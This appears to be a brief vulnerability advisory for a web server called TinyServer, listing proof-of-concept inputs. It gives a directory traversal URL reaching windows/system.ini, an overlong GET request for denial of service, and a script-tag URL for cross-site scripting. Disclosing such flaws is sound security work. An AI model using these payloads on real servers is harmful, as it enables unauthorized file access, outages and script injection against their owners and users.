• info
• discussion
• exploit
• solution
• references

TinyServer Multiple Vulnerabilities

The following proof of concept was supplied:

Directory traversal:
http://[host]/../../windows/system.ini

Denial of service:
GET /index.htm

index.htm

GET /aaaaaa[ 260 of a ]aaa HTTP/1.1

Cross-site scripting:
http://[host]/<script>alert("Test")</script>